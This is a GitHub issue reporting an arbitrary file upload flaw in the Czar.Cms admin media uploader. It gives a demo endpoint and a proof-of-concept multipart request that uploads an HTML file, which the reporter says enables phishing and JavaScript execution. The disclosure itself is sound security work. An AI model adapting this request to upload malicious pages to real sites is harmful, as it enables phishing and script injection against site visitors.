Czar.Cms icon indicating copy to clipboard operation
Czar.Cms copied to clipboard

Arbitrary file upload vulnerability exists in the background

Open alilovetaozi opened this issue 5 years ago • 0 comments

Can upload Html Cause fishing attacks , JavaScript Code execution 图片 url :http://demo.zkea.net/admin/media/upload poc : -----------------------------189153225812082 Content-Disposition: form-data; name="file"; filename="test.html" Content-Type: application/octet-stream

hello world! -----------------------------189153225812082 Content-Disposition: form-data; name="parentId"

-----------------------------189153225812082 Content-Disposition: form-data; name="size"

14 -----------------------------189153225812082-- 图片

alilovetaozi avatar Oct 11 '19 08:10 alilovetaozi